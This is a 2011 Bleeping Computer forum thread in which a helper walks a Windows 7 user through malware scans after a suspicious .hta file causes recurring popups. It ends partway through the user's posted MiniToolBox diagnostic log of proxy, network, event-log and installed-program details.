Constant popups appearing, likely from mshta.exe

19 replies to this topic

#1 DaFe

DaFe

  • Members
  • 10 posts
  • OFFLINE
  • Local time:05:38 AM

Posted 04 August 2011 - 04:13 PM

Hi!

Just earlier tonight, being the impatient idiot I am and trusting my antivirus software too much, I let IE open a page with a WindowsMediaPlayer.hta file that my Firefox couldn't handle. It proceeded to open Windows Media Player, which I rarely use, and additionally gave me a nice popup in Japanese. While I can close the popup (it's not a regular IE/Firefox window), it always returns in but a few seconds.

Checking the process it's connected to in Process Manager gives me mshta.exe *32, which is located in C:\Windows\SysWOW64. A quick googling tells me that this file should be in a different folder and that I likely have an infection of sorts. I also saw some reports of this being related to tasks having been generated for Windows, and checking my current tasks does return 2 tasks being run today - GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA. As far as I know I have no Google software installed that would require these, so they seem to be part of the problem. As I also saw a multitude of trojan reports in combination with this problem, I figured it's best I do nothing before I get some good advice. Thus, here I am.

What I've done so far:
Ran my anti-virus software's full check (F-Secure Client Security), which found but one tracking cookie. The problem still persists.

I'm running 64bit windows 7.

How should I proceed in fixing this problem? So far I haven't even dared to restart my computer in fear of worsening the situation.

Thank you for your help in advance,
DaFe


#2 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 04 August 2011 - 06:59 PM

Hi DaFe,

:welcome: to Bleeping Computer.

My name is Jason and I'll be helping you with your computer problems. You can call me by my screen name jntkwx, or Jason is fine.

Some things to remember while we are working together.

  • Do not run any other tool until instructed to do so!
  • Please do not attach logs or put logs in code boxes.
  • Tell me about any problems that have occurred during the fix.
  • Tell me of any other symptoms you may be having as these can also help.
  • Do not run anything while running a fix.
  • If you don't understand a step, please ask for clarification before continuing with any future steps.

Click on the Watch Topic button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

Note to others: The instructions here are intended for the person who began this topic. If you need help, please create your own topic in the appropriate forum.

 

:step1: Please download MiniToolBox and run it.

Checkmark following boxes:
  • Report IE Proxy Settings
  • Report FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List last 10 Event Viewer Log Errors
  • List Installed Programs
  • List Users, Partitions and Memory size
Click Go . Please put code boxes around just this entire log, like this, but without the letter x: [xcode] MiniToolBox log [/xcode]

:step2: Please download Malwarebytes Anti-Malware and save it to your desktop.
Download Link 1
Download Link 2
MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's TeaTimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
    For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Quick Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

Troubleshoot Malwarebytes' Anti-Malware

:step3: SUPERAntiSpyware (SAS):

Download and scan with SUPERAntiSpyware Free for Home Users
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from http://www.superantispyware.com/downloads/SASDEFINITIONS.EXE (copy and paste that website address) and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked (leave all others checked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Home" button to leave the control center screen.
  • Back on the main screen, under "Select Scan Type" click Complete Scan.
  • On the left, make sure you check C:\.
  • Click Start Complete Scan > Please be patient while it scans your computer.
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes".
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.
If you have a problem downloading, installing or getting SAS to run, try downloading and using the SUPERAntiSpyware Portable Scanner instead. Save the randomly named file (i.e. SAS_1710895.COM) to a USB drive or CD and transfer to the infected computer. Then double-click on it to launch and scan. The file is randomly named to help keep malware from blocking the scanner.

:step4: Please download GMER from one of the following locations and save it to your desktop:
  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.
  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and be sure to re-enable your anti-virus, Firewall and any other security programs you had disabled.

IMPORTANT! If for some reason GMER refuses to run, try again.
If it still fails, try to UN-check "Devices" in right pane.
If still no joy, try to run it from Safe Mode.

:step5: Please download SystemLook from one of the links below and save it to your Desktop.
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    mshta.exe /md5
    
    :dir
    %windir%\system32 /t5
    %windir%\syswow64 /t5
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt


In your next reply, please include:
  • MiniToolBox log
  • Malwarebytes log
  • SUPERAntiSpyware log
  • GMER log
  • SystemLook log
  • How's your computer running now?

Edited by jntkwx, 04 August 2011 - 07:00 PM.

Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation.


#3 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  • Local time:05:38 AM

Posted 05 August 2011 - 12:05 PM

Hi, below are the logs you requested:

MiniToolBox by Farbar 
Ran by onoff (administrator) on 05-08-2011 at 16:36:09
Windows 7 Home Premium  (X64)

***************************************************************************

========================= IE Proxy Settings: ============================== 

Proxy is not enabled.
ProxyServer: 49.212.15.191:3128

========================= FF Proxy Settings: ============================== 

========================= Hosts content: =================================



========================= IP Configuration: ================================

# ----------------------------------
# IPv4-maaritys
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled


popd
# IPv4-kokoonpanon loppu.



Windows IP-maaritykset

        Isantanimi  . . . . . . . . . . . : onoff-PC
        Ensisijainen DNS-liite  . . . . . : 
        Solmutyyppi . . . . . . . . . . . : Hybridi
        IP-reititys kaytossa  . . . . . . : Ei
        WINS-valityspalvelin kaytossa . . : Ei
        DNS-liitteiden etsintaluettelo  . : dhcp.inet.fi

Ethernet-sovitin Lahiverkkoyhteys:

        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.20)
        Fyysinen osoite . . . . . . . . . : 48-5B-39-39-7C-7F
        DHCP kaytossa . . . . . . . . . . : Kylla
        Automaattinen maaritys kaytossa . : Kylla
   Linkin paikallinen IPv6-osoite. . : fe80::a0b3:475e:94c5:1419%12(Ensisijainen) 
   IPv4-osoite . . . . . . . . . . . : 88.192.255.236(Ensisijainen) 
        Aliverkon peite . . . . . . . . . : 255.255.240.0
        Kayttolupa myonnetty  . . . . . . : 4. elokuuta 2011 20:19:31
        Kayttolupa vanhenee . . . . . . : 6. elokuuta 2011 2:34:32
        Oletusyhdyskaytava. . . . . . . . : 88.192.240.1
        DHCP-palvelin . . . . . . . . . . : 84.251.112.1
   DHCPv6-IAID . . . . . . . . . . . : 340286265
   DHCPv6-asiakkaan DUID-tunnus  . . : 00-01-00-01-13-40-EC-22-1C-4B-D6-55-F7-EC
        DNS-palvelimet  . . . . . . . . . : 192.89.123.231
                                            193.210.19.190
   NetBIOS TCP/IP:n paalla . . . . . : Kaytossa

Langattoman lahiverkon sovitin Langaton verkkoyhteys:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : TeleWell.gateway
        Kuvaus  . . . . . . . . . . . . . : Atheros AR9285 Wireless Network Adapter
        Fyysinen osoite . . . . . . . . . : 1C-4B-D6-55-F7-EC
        DHCP kaytossa . . . . . . . . . . : Kylla
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin isatap.TeleWell.gateway:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : 
        Kuvaus  . . . . . . . . . . . . . : Microsoft ISATAP -sovitin
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin isatap.dhcp.inet.fi:

        Laitteen tila . . . . . . . . . . : Ei kytketty
        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Microsoft ISATAP -sovitin #2
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla

Tunnelisovitin 6TO4 Adapter:

        Yhteyskohtainen DNS-liite . . . . : dhcp.inet.fi
        Kuvaus  . . . . . . . . . . . . . : Microsoft 6to4 -sovitin
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla
   IPv6-osoite . . . . . . . . . . . : 2002:58c0:ffec::58c0:ffec(Ensisijainen) 
        Oletusyhdyskaytava. . . . . . . . : 2002:c058:6301::c058:6301
        DNS-palvelimet  . . . . . . . . . : 192.89.123.231
                                            193.210.19.190
        NetBIOS TCP/IP:n paalla . . . . . : Ei kaytossa

Tunnelisovitin Teredo Tunneling Pseudo-Interface:

        Yhteyskohtainen DNS-liite . . . . : 
        Kuvaus  . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
        Fyysinen osoite . . . . . . . . . : 00-00-00-00-00-00-00-E0
        DHCP kaytossa . . . . . . . . . . : Ei
        Automaattinen maaritys kaytossa . : Kylla
   Linkin paikallinen IPv6-osoite. . : fe80::d:92a:a73f:13%15(Ensisijainen) 
        Oletusyhdyskaytava. . . . . . . . : 
   DHCPv6-IAID . . . . . . . . . . . : 452984832
   DHCPv6-asiakkaan DUID-tunnus  . . : 00-01-00-01-13-40-EC-22-1C-4B-D6-55-F7-EC
        NetBIOS TCP/IP:n paalla . . . . . : Ei kaytossa
Palvelin:  ns.inet.fi
Address:  192.89.123.231

Nimi:    google.com
Addresses:  209.85.148.99
	  209.85.148.103
	  209.85.148.104
	  209.85.148.105
	  209.85.148.106
	  209.85.148.147


Ping-isanta: google.com [209.85.148.147] 32 tavua tietoja:
Vastaus isannalta 209.85.148.147: tavuja=32 aika=41 ms TTL=54
Vastaus isannalta 209.85.148.147: tavuja=32 aika=42 ms TTL=54

Ping-tilastot 209.85.148.147:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 41 ms, Suurin = 42 ms, Keskiarvo = 41 ms
Palvelin:  ns.inet.fi
Address:  192.89.123.231

Nimi:    yahoo.com
Addresses:  69.147.125.65
	  72.30.2.43
	  98.137.149.56
	  209.191.122.70
	  67.195.160.76


Ping-isanta: yahoo.com [209.191.122.70] 32 tavua tietoja:
Vastaus isannalta 209.191.122.70: tavuja=32 aika=157 ms TTL=52
Vastaus isannalta 209.191.122.70: tavuja=32 aika=156 ms TTL=52

Ping-tilastot 209.191.122.70:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 156 ms, Suurin = 157 ms, Keskiarvo = 156 ms

Ping-isanta: 127.0.0.1 32 tavua tietoja:
Vastaus isannalta 127.0.0.1: tavuja=32 aika<1ms TTL=128
Vastaus isannalta 127.0.0.1: tavuja=32 aika<1ms TTL=128

Ping-tilastot 127.0.0.1:
    Paketit: Lahetetty = 2, Vastaanotettu = 2, Kadonnut = 0
             (0% havikki),
Arvioitu kiertoaika millisekunteina:
    Pienin = 0 ms, Suurin = 0 ms, Keskiarvo = 0 ms
===========================================================================
Sovitinluettelo
 12...48 5b 39 39 7c 7f ......Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.20)
 11...1c 4b d6 55 f7 ec ......Atheros AR9285 Wireless Network Adapter
  1...........................Software Loopback Interface 1
 17...00 00 00 00 00 00 00 e0 Microsoft ISATAP -sovitin
 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP -sovitin #2
 19...00 00 00 00 00 00 00 e0 Microsoft 6to4 -sovitin
 15...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 -reititystaulukko
===========================================================================
Active Routes:
Verkkokohde        Verkon peite          Yhdyskaytava     Liittyma  Metric-arvo
          0.0.0.0          0.0.0.0     88.192.240.1   88.192.255.236     20
     88.192.240.0    255.255.240.0   Linkin maarittama    88.192.255.236    276
   88.192.255.236  255.255.255.255   Linkin maarittama    88.192.255.236    276
   88.192.255.255  255.255.255.255   Linkin maarittama    88.192.255.236    276
        127.0.0.0        255.0.0.0   Linkin maarittama         127.0.0.1    306
        127.0.0.1  255.255.255.255   Linkin maarittama         127.0.0.1    306
  127.255.255.255  255.255.255.255   Linkin maarittama         127.0.0.1    306
        224.0.0.0        240.0.0.0   Linkin maarittama         127.0.0.1    306
        224.0.0.0        240.0.0.0   Linkin maarittama    88.192.255.236    276
  255.255.255.255  255.255.255.255   Linkin maarittama         127.0.0.1    306
  255.255.255.255  255.255.255.255   Linkin maarittama    88.192.255.236    276
===========================================================================
Jatkuvat reitit:
  Ei mitaan

IPv6 -reititystaulukko
===========================================================================
Active Routes:
 Jos verkkokohde on Metric-kohdeyhdyskaytava
 19   1125 ::/0                     2002:c058:6301::c058:6301
  1    306 ::1/128                  Linkin maarittama
 19   1025 2002::/16                Linkin maarittama
 19    281 2002:58c0:ffec::58c0:ffec/128
                                    Linkin maarittama
 12    276 fe80::/64                Linkin maarittama
 15    306 fe80::/64                Linkin maarittama
 15    306 fe80::d:92a:a73f:13/128  Linkin maarittama
 12    276 fe80::a0b3:475e:94c5:1419/128
                                    Linkin maarittama
  1    306 ff00::/8                 Linkin maarittama
 15    306 ff00::/8                 Linkin maarittama
 12    276 ff00::/8                 Linkin maarittama
===========================================================================
Jatkuvat reitit:
  Ei mitaan

========================= Event log errors: ===============================

Application errors:
==================
Error: (08/05/2011 00:00:07 AM) (Source: FSecure-FSecure-F-Secure Anti-Virus) (User: )
Description: 1  2011-08-05  00:00:04+03:00  onoff-pc  ONOFF-PC\onoff  F-Secure Anti-Virus
 Manual scanning was finished - spyware was found in the system.

Error: (07/30/2011 07:24:33 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0x2b60
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/17/2011 04:18:14 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0xe894
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/13/2011 11:13:23 PM) (Source: Application Error) (User: )
Description: Viallisen sovelluksen nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Viallisen moduulin nimi: OfficeLiveSignIn.exe, versio: 2.0.2313.0, aikaleima: 0x491c0a79
Poikkeuskoodi: 0xc0000005
Virhepoikkeama: 0x00003ce7
Viallisen prosessin tunnus: 0x5258
Viallisen sovelluksen kaynnistysaika: 0xOfficeLiveSignIn.exe0
Viallisen sovelluksen polku: OfficeLiveSignIn.exe1
Viallisen moduulin polku: OfficeLiveSignIn.exe2
Raportin tunnus: OfficeLiveSignIn.exe3

Error: (07/09/2011 04:14:37 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.

Error: (07/09/2011 04:14:37 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.

Error: (07/09/2011 04:13:31 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (assemblyIdentity1). Virhe luettelo- tai kaytantotiedoston assemblyIdentity2 rivilla assemblyIdentity3.
Maaritteen version arvo (MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR) ei kelpaa elementissa assemblyIdentity.

Error: (07/09/2011 03:13:08 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (assemblyIdentity1). Virhe luettelo- tai kaytantotiedoston assemblyIdentity2 rivilla assemblyIdentity3.
Maaritteen version arvo (MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR) ei kelpaa elementissa assemblyIdentity.

Error: (07/03/2011 08:29:04 AM) (Source: FSecure-FSecure-F-Secure Anti-Virus) (User: )
Description: 1  2011-07-03  08:28:21+03:00  onoff-pc  onoff-PC\onoff  F-Secure Anti-Virus
 An error occurred while scanning \DEVICE\HARDDISKVOLUME2\WINDOWS\SERVICEPROFILES\LOCALSERVICE\APPDATA\ROAMING\PEERNETWORKING\093AF2A2EC3ABB4539E32ABCBAD6164C99A95A53.HOMEGROUPCLASSIFIER\5D26D5CBDF1AEF5C80BF2730EB5F5EAB\GROUPING\DB.MDB.

Error: (06/02/2011 00:13:36 AM) (Source: SideBySide) (User: )
Description: Aktivointikontekstin luonti epaonnistui (1). Virhe luettelo- tai kaytantotiedoston 2 rivilla 3.
XML-syntaksi ei kelpaa.


System errors:
=============
Error: (08/04/2011 08:18:55 PM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta Wlansvc-palvelusta.

Error: (08/04/2011 09:51:54 AM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta Netman-palvelusta.

Error: (07/30/2011 08:17:53 PM) (Source: EventLog) (User: )
Description: Edellinen jarjestelman sammutus (20:11:34, ?30.?7.?2011) oli odottamaton.

Error: (07/28/2011 08:14:16 PM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta ShellHWDetection-palvelusta.

Error: (07/27/2011 08:33:55 AM) (Source: Service Control Manager) (User: )
Description: Aikakatkaisu (30000 millisekuntia) odotettaessa tapahtuman vastausta ShellHWDetection-palvelusta.

Error: (07/26/2011 10:04:43 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:42 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:42 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:41 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.

Error: (07/26/2011 10:04:41 PM) (Source: Disk) (User: )
Description: Ohjain havaitsi korttivirheen laitteella \Device\Harddisk1\DR7.


Microsoft Office Sessions:
=========================

=========================== Installed Programs ============================


7-Zip 9.20
Acrobat.com (Version: 1.6.65)
Adobe AIR (Version: 1.5.0.7220)
Adobe Flash Player 10 ActiveX (Version: 10.0.32.18)
Adobe Flash Player 10 Plugin (Version: 10.0.32.18)
Adobe Reader 9.2 MUI (Version: 9.2.0)
Alcor Micro USB Card Reader (Version: 1.5.17.25482)
Alice Greenfingers
Anki
ASUS AI Recovery (Version: 1.0.8)
ASUS AP Bank (Version: 1.0.0.0)
ASUS FancyStart (Version: 1.0.8)
ASUS LifeFrame3 (Version: 3.0.20)
ASUS Live Update (Version: 2.5.9)
ASUS MultiFrame (Version: 1.0.0021)
ASUS Power4Gear Hybrid (Version: 1.1.29)
ASUS SmartLogon (Version: 1.0.0007)
ASUS WebStorage (Version: 2.0.40.1319)
ASUS Virtual Camera (Version: 1.0.19)
ASUS_UL_Series_Screensaver
ATK Generic Function Service (Version: 1.00.0008)
ATK Hotkey (Version: 1.0.0053)
ATK Media (Version: 2.0.0006)
ATKOSD2 (Version: 7.0.0007)
Chicken Invaders 2
Combined Community Codec Pack 2010-10-10 (Version: 2010.10.10.0)
ControlDeck (Version: 1.0.5)
CoreAVC Professional Edition (remove only)
CyberLink LabelPrint (Version: 2.5.1908)
CyberLink Power2Go (Version: 6.1.3509a)
DAEMON Tools Lite (Version: 4.40.1.0127)
Dream Day Wedding Married in Manhattan
ETDWare PS/2-x64 7.0.5.9_WHQL
Express Gate (Version: 1.2.13.40)
F-Secure Client Security - DeepGuard
F-Secure Client Security - Internet-suojaus
F-Secure Client Security - Sahkopostin tarkistus
F-Secure Client Security - Selaussuojaus
F-Secure Client Security - Web-liikenteen tarkistus
F-Secure Client Security - Virus- ja vakoilusuojaus
Fast Boot (Version: 1.0.5)
G-Senjou no Maou English (Version: 1.0.0.716)
Game Park Console (Version: 6.2.0.2)
Google Chrome (Version: 13.0.782.107)
Google Toolbar for Internet Explorer (Version: 1.0.0)
Google Update Helper (Version: 1.3.21.65)
Haali Media Splitter
Java Auto Updater (Version: 2.0.3.1)
Java(TM) 6 Update 24 (Version: 6.0.240)
Junk Mail filter update (Version: 14.0.8117.416)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft .NET Framework 4 Client Profile FIN Language Pack (Version: 4.0.30319)
Microsoft .NET Framework 4 Client Profilen suomen kielipaketti (Version: 4.0.30319)
Microsoft Application Error Reporting (Version: 12.0.6015.5000)
Microsoft Office Access MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Access MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Enterprise 2007 (Version: 12.0.4518.1014)
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Excel MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Groove MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office InfoPath MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Language Pack 2007 - Finnish/suomi (Version: 12.0.4518.1021)
Microsoft Office Live Add-in 1.3 (Version: 2.0.2313.0)
Microsoft Office O MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.4518.1014)
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office OneNote MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Outlook MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office PowerPoint MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Proof (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Proof (French) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (German) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proof (Swedish) 2007 (Version: 12.0.4518.1020)
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Proofing (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Publisher MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared 64-bit MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Shared MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office SharePoint Designer MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.4518.1014)
Microsoft Office Word MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Office X MUI (Finnish) 2007 (Version: 12.0.4518.1021)
Microsoft Search Enhancement Pack (Version: 3.0.133.0)
Microsoft Silverlight (Version: 4.0.50401.0)
Microsoft Tallenna PDF- tai XPS-muodossa -apuohjelma 2007 Microsoft Office -ohjelmiin (Version: 12.0.4518.1021)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (Version: 8.0.51011)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (Version: 9.0.30729.4148)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (Version: 9.0.21022)
mIRC (Version: 7.19)
Mobile Partner (Version: 11.002.03.01.260)
Mozilla Firefox 5.0 (x86 fi) (Version: 5.0)
MSVCRT (Version: 14.0.1468.721)
MSXML 4.0 SP3 Parser (KB973685) (Version: 4.30.2107.0)
NVIDIA Drivers (Version: 1.3)
OpenOffice.org 3.2 (Version: 3.2.9502)
Piggly FREE
Real Alternative 2.0.2 (Version: 2.0.2)
Realtek High Definition Audio Driver (Version: 6.0.1.5958)
Smileyville FREE
SRS Premium Sound Control Panel (Version: 1.8.1700)
USB 2.0 UVC 0.3M WebCam
WIDCOMM Bluetooth Software (Version: 6.2.5.500)
Windows Driver Package - Broadcom Bluetooth  (07/17/2009 6.2.0.9403) (Version: 07/17/2009 6.2.0.9403)
Windows Driver Package - Broadcom Bluetooth  (07/29/2009 6.1.7100.0) (Version: 07/29/2009 6.1.7100.0)
Windows Driver Package - Broadcom HIDClass  (06/11/2009 6.2.0.9500) (Version: 06/11/2009 6.2.0.9500)
Windows Live -perheturva (Version: 14.0.8118.427)
Windows Live Call (Version: 14.0.8117.0416)
